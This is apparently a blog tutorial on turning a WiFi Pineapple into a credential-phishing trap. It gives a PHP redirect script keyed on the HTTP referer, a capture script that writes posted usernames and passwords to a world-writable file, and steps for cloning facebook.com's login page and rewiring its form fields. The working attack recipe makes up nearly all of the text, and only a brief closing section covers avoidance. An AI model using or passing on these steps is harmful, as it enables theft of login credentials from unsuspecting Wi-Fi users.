Testing the PHP installation

PHP has a handy little function for testing the its installation. If you rebooted your WiFi Pineapple you’ll need to log back into a shell as root. Once situated, change directory to /www/ with the “cd /www/” command. Now we’ll need to create a test.php file so issue “touch test.php”. Next issue “<?php phpinfo(); ?>” > test.php”. Verify that the string has written to the file with the command “cat test.php”.

With the file written we can test the php install by navigating to test.php on the web server. Remember, following the instructions from the Auto-Rickrolling WiFi Pineapple article we’re able to get to the web server from any URL requested. Based on the dnsmasq.conf, there is no difference between example.com and google.com. Pointing your browser to, say, http://example.com/test.php should yield the following results:

Write redirection and capture scripts

Given that the dnsmasq.conf file will send any URL requested to the root of the web server we will need to write a small PHP script to identify the requested URL and present the user with the corresponding page. Once the user logs into the faux page we’ll use an error.php script to capture the credentials and log them in a file.

Unfortunately at the time of writing I have been unable to convince the tiny web server to process php files as indexes. The cheap workaround for now is to write a simple meta redirect index.html file that points to our redirect.php script for the actual processing. Hopefully this step can be removed in the future, but for now you’ll need to open the index.html file in /www/ using your favorite editor and replace the contents with the following:

<html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php">

Now for the fun page. Create a redirect.php file with the command “touch redirect.php” and open it with a text editor, for example “vi redirect.php”.

Note: If you’re new to vi here’s a bare-minimum introduction: There are two modes to vi, command mode and insert mode. By default you’ll be in command mode. Press “i” to enter insert mode allowing you to type into the file. Press ESC to get back to command mode. The command “:x” saves and quits. Learn more about using vi.

Here’s an example redirect.php script. Modify as you see necessary. We’ll break it down line by line.

<?php
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

require('peets.html');

?>

The first line tells PHP to start processing the following lines of code.

The second sets the value of the variable “ref” as the HTTP_REFERER. This variable is obtained from “_SERVER” and basically tells us what URL the client is coming from. Since dnsmasq.conf is set to send any website to the root of our web server this could be anything.

The third line uses the srtpos function to look inside the “ref” variable that we just set and see if the word “facebook” is somewhere inside. This means that both “http://facebook.com” and “http://www.facebook.com” would return true. Note: Same goes for facebooksucks.com or any variation that contains the string “facebook”.

If the word “facebook” is found in the variable “ref” the function header will set the location of the browser to facebook.html – a file we’ll create here in a minute.

To phish multiple domains you would create additional similar if statements customized to the urls desired.

The fourth line will only be processed if the statements above aren’t found to be true. In our example we’re only looking for facebook but the list could be more extensive. The require function tells php to load up the contents of the file—in our case peets.html. This could be anything from terms of service agreement, an in-flight Internet purchase page or the old index file from our beloved Auto-Rickroll.

The fifth line closes the PHP processing.

In order to capture the data posted from our faux pages we’ll need to craft an error.php file. Without going into a line-by-line explanation, basically this file looks for two variables posted to it – name and pass – and writes them to the file bitches.txt

We’ll need to create the bitches.txt file in /www/ and change its permissions so issue both “touch /www/bitches.txt” and “chmod 777 /www/bitches.txt”

I have included a few lines to prevent tampering and add logging. The end of the file is basic html to display a faux “503 Service Unavailable” error. Again, this can be customized to your hearts content. For example, returning to the login page may convince an unwitting user that their password wasn’t accepted and give them the opportunity to try “their other password”.

Modify a website to capture credentials

The last step in this phishing attack is to actually rip and modify the pages of our faux sites. In our example so far we’ve been using facebook.com as the target, so follow this example. Using a web browser (or getting fancy with curl or wget) save the homepage of your target site. In chrome click the wrench and choose “Save page as”. Save the site as “Web page complete”. This will save not only the HTML but create a folder including the additional image and javascript components.

Open the html file in your favorite text editor and look for the following string: “form method=”post”". Set the action variable to equal “error.php”.

Now check for the string “input type=”text”" and find the username field. Change the name variable to equal “name” if it is not so already.

Finally check for the string “input type=”password”" and change the name variable to “pass”.

Your faux login page is now ready to be uploaded to the WiFi Pineapple. Using a tool such as WinSCP copy the facebook.html and accompanying facebook folder to /www/ on the device.

With these three modifications your error.php script will pickup the contents of the name and pass text fields. Test this by browsing to facebook.com while connected to your WiFi Pineapple. You should see your faux login page. Entering fake credentials should bring you to the error.php displaying a fake 503 error, and checking facebook.com/bitches.txt should display the captured information.

How not to fall victim to this attack

Obviously disk limitations on the WiFi Pineapple are going to prevent one from serving up face versions of every site on the Internet – so if you’re connected to one of these devious devices and can’t access an obscure URL, something is up. You’ll also notice that navigating to facebook.com in this example forwards you to facebook.com/facebook.html – which should be a sure sign of trouble. The most obvious part about this attack is that every domain you could possibly ping is going to report back a response from 192.168.1.1 – a huge red alert that you’re not in Kansas anymore.

Finally keep in mind that having two or three passwords isn’t enough. Every site needs its own secure and unique password. Consider using a password manager such as LastPass, 1Password or KeePass.

For further reading and advice on identifying phishing sites see antiphishing.org.